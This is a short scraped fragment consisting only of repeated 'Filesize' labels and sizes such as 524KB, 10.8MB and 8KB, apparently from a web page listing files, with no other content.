524KB
-
Filesize
524KB
-
Filesize
524KB
-
Filesize
10.8MB
-
Filesize
10.8MB
-
Filesize
10.8MB
-
Filesize
10.8MB
-
Filesize
8KB
-
Filesize
10.8MB
-
Filesize
136KB
-
Filesize
8KB
-
Filesize
524KB
-
Filesize
524KB
-
Filesize
524KB
-
Filesize
524KB
-
Filesize
524KB
-
Filesize
524KB
-
Filesize
524KB
-
Filesize
524KB
-
Filesize
524KB
-
Filesize
524KB
-
Filesize
524KB
-
Filesize
524KB
-
Filesize
524KB
-
Filesize
524KB
-
Filesize
524KB
-
Filesize
524KB
-
Filesize
524KB
-
Filesize
524KB
-
Filesize
524KB
-
Filesize
524KB
-
Filesize
524KB
-
Filesize
524KB